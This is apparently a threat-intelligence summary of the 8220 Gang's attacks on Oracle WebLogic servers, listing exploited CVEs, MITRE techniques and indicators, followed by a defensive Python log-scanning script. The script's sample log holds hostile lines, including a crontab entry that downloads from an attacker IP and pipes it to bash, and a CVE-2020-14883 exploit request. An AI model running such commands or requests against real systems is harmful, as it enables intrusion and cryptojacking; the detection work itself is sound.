Hadooken and K4Spreader: The 8220 Gang’s Newest Weapons

This report documents the 8220 Gang's attacks on Oracle WebLogic servers, exploiting CVE-2017-10271 and CVE-2020-14883 to deploy K4Spreader, the Tsunami backdoor, and a Monero cryptominer on both Windows and Linux hosts. It also notes links between K4Spreader and the Hadooken malware. The 8220 Gang is a China-based intrusion set focused on cloud environments, with notable activity in South America, especially Brazil. Hashtags: #K4Spreader #Tsunami #Hadooken #Monero #8220Gang #Brazil #OracleWebLogic

Key points

  • Exploitation of CVE-2017-10271 and CVE-2020-14883 in Oracle WebLogic to gain initial access.
  • Malware stack includes K4Spreader, Tsunami backdoor, and a Monero cryptominer.
  • Initial access observed from a single IP address (77.221.151.174) within a 24‑hour window.
  • Both Windows and Linux targets indicate an opportunistic, cross‑platform approach.
  • 8220 Gang is linked to attacks on cloud environments; Asia is its primary target region, with Brazil a notable additional cluster of victims.
  • Strong overlaps between K4Spreader and Hadooken suggest a shared operational framework.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of WebLogic vulnerabilities for initial access. Quote: “The attacker exploited CVE-2017-10271 and CVE-2020-14883 Weblogic vulnerabilities to deploy Python and Bash scripts, executing the K4Spreader malware.”
  • [T1059.006] Command and Scripting Interpreter: Python – Python scripts used to deploy K4Spreader. Quote: “Execution of malicious scripts (Python, Bash, PowerShell) to deploy malware.”
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – Bash scripts used to deploy payloads on Linux. Quote: “Execution of malicious scripts (Python, Bash, PowerShell) to deploy malware.”
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Windows payload delivery via PowerShell. Quote: “PowerShell script designed to install a cryptominer via a .NET-based loader.”
  • [T1053.003] Scheduled Task/Job: Cron – Cron jobs created for persistence on Linux hosts. Quote: “Creation of cron jobs to maintain persistence on infected systems.”
  • [T1110.001] Brute Force: Password Guessing – SSH brute forcing used for lateral movement. Quote: “SSH brute force attempts to spread across the network.”
  • [T1071] Application Layer Protocol – IRC used for command and control (ATT&CK has no IRC-specific sub-technique). Quote: “Use of IRC for command and control communication.”
  • [T1496] Resource Hijacking – Monero mining on compromised hosts. Quote: “Mining of Monero cryptocurrency using compromised resources.”

Indicators of Compromise

  • [IP] – Observed exploitation/attack origins – 77.221.151.174, 80.78.24.30
  • [IP] – Mining/C2 activity addresses – 51.222.111.116:80, 198.199.85.230
  • [Domain] – Download/C2 domains – sck-dns.cc, play.sck-dns.cc
  • [Domain] – C2/alias domains – c4k-ircd.pwndns.pw (alias to pwn.oracleservice.top)
  • [Wallet] – Monero wallet used for mining – 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ
  • [URL] – Download/loader files – hxxp://154.213.192[.]44/Ueordwfkay.pdf, hxxp://154.213.192[.]44/plugin3.dll
  • [File] – Loader/application artifacts – CCleaner64.exe, 2.gif
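The MITRE techniques and indicators above are most useful when they can be run over real telemetry. The following is an added example (not code from the report or from Sekoia) that refangs the page's indicators and scans log lines for the IPs, domains, wallet and file names listed above, plus the publicly documented request paths for the two WebLogic CVEs. The log lines are constructed for the example; the CVE path patterns (the WLS-WSAT endpoint for CVE-2017-10271 and the console `handle=` gadget for CVE-2020-14883) are assumptions drawn from public write-ups rather than from this report.

```python
"""Hunt for the 8220 Gang IoCs and WebLogic exploitation patterns in log lines."""
import re

# Network, wallet and file IoCs taken from the report (URL/IP refanged for matching).
IOC_IPS = {
    "77.221.151.174", "80.78.24.30",        # exploitation / attack origins
    "51.222.111.116", "198.199.85.230",     # mining / C2
    "154.213.192.44",                       # loader download host
}
IOC_DOMAINS = {"sck-dns.cc", "play.sck-dns.cc", "c4k-ircd.pwndns.pw", "pwn.oracleservice.top"}
IOC_WALLET = ("46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4q"
              "JzFXLVHGYH4moQ")
IOC_FILES = {"Ueordwfkay.pdf", "plugin3.dll", "CCleaner64.exe", "2.gif"}

# Assumption: publicly documented exploitation paths for the two CVEs, not from the report.
# CVE-2017-10271 abuses the WLS-WSAT XMLDecoder endpoint; CVE-2020-14883 passes a gadget
# class via the console 'handle=' parameter (usually chained with the CVE-2020-14882 bypass).
WEBLOGIC_PATTERNS = {
    "CVE-2017-10271": re.compile(r"/wls-wsat/", re.I),
    "CVE-2020-14883": re.compile(
        r"/console/.*handle=com\.(tangosol\.coherence\.mvel2\.sh\.ShellSession|"
        r"bea\.core\.repackaged\.springframework\.context\.support\.FileSystemXmlApplicationContext)",
        re.I),
}

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
# Match each domain only as a whole host (so 'play.sck-dns.cc' does not also fire 'sck-dns.cc').
DOMAIN_PATTERNS = {d: re.compile(r"(?<![\w.-])" + re.escape(d) + r"(?![\w-])", re.I)
                   for d in IOC_DOMAINS}


def refang(text):
    """Turn defanged indicators (hxxp://, [.]) back into a matchable form."""
    return text.replace("hxxp", "http").replace("[.]", ".")


def scan_line(line):
    """Return (category, indicator) pairs found in one log line."""
    hits = []
    line = refang(line)
    for ip in IPV4.findall(line):
        if ip in IOC_IPS:
            hits.append(("ioc_ip", ip))
    for dom in sorted(DOMAIN_PATTERNS):
        if DOMAIN_PATTERNS[dom].search(line):
            hits.append(("ioc_domain", dom))
    if IOC_WALLET in line:
        hits.append(("ioc_wallet", IOC_WALLET))
    low = line.lower()
    for name in sorted(IOC_FILES):
        if name.lower() in low:
            hits.append(("ioc_file", name))
    for cve, pat in WEBLOGIC_PATTERNS.items():
        if pat.search(line):
            hits.append(("weblogic_exploit", cve))
    return hits


def scan(lines):
    """Scan many lines; return (line_number, category, indicator) tuples."""
    out = []
    for n, line in enumerate(lines, 1):
        for cat, val in scan_line(line):
            out.append((n, cat, val))
    return out


# Constructed sample telemetry: WebLogic access log entries, a crontab line, a miner config.
SAMPLE_LOG = [
    '77.221.151.174 - - [10/Sep/2024:10:01:02 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1234',
    '77.221.151.174 - - [10/Sep/2024:10:03:15 +0000] "GET /console/css/%252e%252e%252fconsole.portal'
    '?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22id%22) HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Sep/2024:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 88',
    '* * * * * curl -s hxxp://154.213.192[.]44/2.gif | bash',
    '"url": "play.sck-dns.cc:80", "user": "' + IOC_WALLET + '"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Line 3 (a benign request from an internal address) produces no hits; the crontab line is matched only after refanging, which is why `refang` runs before any comparison. Swap `SAMPLE_LOG` for `open(path)` to run it over a real access log or crontab dump.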

Read more: https://blog.sekoia.io/hadooken-and-k4spreader-the-8220-gangs-latest-arsenal/